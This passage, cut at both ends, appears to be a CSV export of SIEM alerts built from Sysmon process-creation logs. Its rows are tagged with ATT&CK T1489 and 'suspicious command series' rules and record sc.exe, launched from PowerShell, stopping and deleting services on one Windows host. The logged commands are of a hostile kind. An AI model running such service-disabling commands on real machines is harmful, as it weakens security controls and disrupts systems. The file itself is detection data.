Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.260",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.939 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001095812600} +ProcessId: 7404 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.941455200Z"",""eventRecordID"":""2973"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.939\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001095812600}\r\nProcessId: 7404\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.939"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001095812600}"",""processId"":""7404"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.213",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.848 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010fc7e2600} +ProcessId: 1496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.877541600Z"",""eventRecordID"":""2970"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.848\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010fc7e2600}\r\nProcessId: 1496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.848"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010fc7e2600}"",""processId"":""1496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.169",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.797 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010557d2600} +ProcessId: 7928 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.819116700Z"",""eventRecordID"":""2968"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.797\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010557d2600}\r\nProcessId: 7928\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.797"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010557d2600}"",""processId"":""7928"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.152",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.773 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00107f7c2600} +ProcessId: 1160 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.777185100Z"",""eventRecordID"":""2967"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.773\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00107f7c2600}\r\nProcessId: 1160\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.773"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-00107f7c2600}"",""processId"":""1160"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.956",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.540 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00105c732600} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.645949300Z"",""eventRecordID"":""2964"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.540\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00105c732600}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.540"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-00105c732600}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.866",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.215 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001013662600} +ProcessId: 6948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.218465000Z"",""eventRecordID"":""2961"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.215\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001013662600}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.215"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001013662600}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.852",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.186 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010d2632600} +ProcessId: 7628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: 